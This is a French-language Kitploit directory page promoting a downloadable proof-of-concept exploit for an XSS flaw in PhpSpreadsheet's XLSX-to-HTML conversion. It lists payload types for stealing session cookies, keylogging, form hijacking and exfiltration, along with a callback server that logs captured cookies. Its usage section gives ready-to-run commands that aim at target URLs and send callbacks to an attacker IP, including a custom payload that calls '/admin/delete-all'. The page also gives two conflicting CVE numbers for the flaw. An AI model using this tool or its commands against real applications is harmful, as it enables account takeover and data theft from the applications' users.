Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-47875-PhpSpreadsheet-XSS-PoC — Ceci est un PoC/Exploit pour la CVE-2024-47875 vulnérabilité XSS de PhpSpreadsheet. | Kitploit
Outils/GitHubGitHub/roj1py/cve-2024-47875-phpspreadsheet-xss-poc
Outils de PhishingGénération de PayloadsExploitationExploitation d'Applications WebExfiltration de DonnéesCommandement et Contrôle
GitHubroj1py/cve-2024-47875-phpspreadsheet-xss-poc

CVE-2024-47875-PhpSpreadsheet-XSS-PoC

Ceci est un PoC/Exploit pour la CVE-2024-47875 vulnérabilité XSS de PhpSpreadsheet.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
15il y a 1 anPas encore vérifié

CVE-2025-22131 • PoC XSS du Writer HTML de PhpSpreadsheet

Aperçu

Ceci est un PoC sur la CVE-2025-22131, une vulnérabilité de type Cross-Site Scripting (XSS) dans les versions de PhpSpreadsheet antérieures à 2.2.2, 2.1.2 et 1.29.4. La vulnérabilité réside dans la fonction generateNavigation(), qui ne nettoie pas les noms de feuilles lors de la conversion XLSX vers HTML, permettant l'injection de JavaScript malveillant.

CVE ID: CVE-2024-47875

Avis GitHub : GHSA-79xx-vf93-p7cx

Versions concernées : PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4

Auteur : Roj

Licence : MIT

Dépôt : Dépôt PoC


Fonctionnalités

📄 Génère des fichiers XLSX malveillants avec des charges utiles XSS personnalisables

🛠️ Prend en charge plusieurs types de charges utiles :

cookie_theft : Vole les cookies de session

redirect : Redirige l'utilisateur vers un site contrôlé par l'attaquant

alert : Affiche une alerte de test pour le PoC

keylogger : Capture les frappes clavier

form_hijack : Intercepte les soumissions de formulaire

data_exfil : Exfiltre les données depuis un point d'accès spécifié

🌐 Serveur HTTP intégré pour capturer les rappels d'exploitation

⬆️ Télécharge les fichiers XLSX malveillants vers un point d'accès cible

💾 Enregistre les données capturées (ex. cookies) dans un fichier JSON

🎨 Sortie terminal colorisée pour une meilleure lisibilité

🔍 Journalisation détaillée pour le débogage


Utilisation

root@kitploit:~
python exploit.py -h

🚀 Exemples d'utilisation :

root@kitploit:~
#Basic cookie theft attack
python3 exploit.py http://target.htb 10.10.16.50

# Custom upload endpoint
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload

# Different payload types
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack

# Custom XSS payload
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"

Je souhaite recevoir des retours , bonne chance à tous.

Télécharger l’outil